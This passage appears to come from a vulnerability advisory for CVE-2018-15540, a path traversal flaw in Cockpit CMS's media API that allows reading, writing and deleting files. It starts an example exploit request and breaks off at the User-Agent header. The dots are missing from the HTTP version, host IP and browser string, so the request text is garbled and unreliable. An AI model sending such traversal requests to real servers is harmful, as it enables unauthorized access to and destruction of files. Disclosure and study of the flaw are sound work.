#1 Path Traversal
CVE-2018-15540
It is possible to read/write/delete files or list directories by using "/" to traverse to other folders via requests
to /cockpit/media/api
Example of a vulnerable request:
POST /cockpit/media/api HTTP/11
Host: 1921685129
User-Agent: Mozilla/50 (Windows NT 100; Win64; x6 ...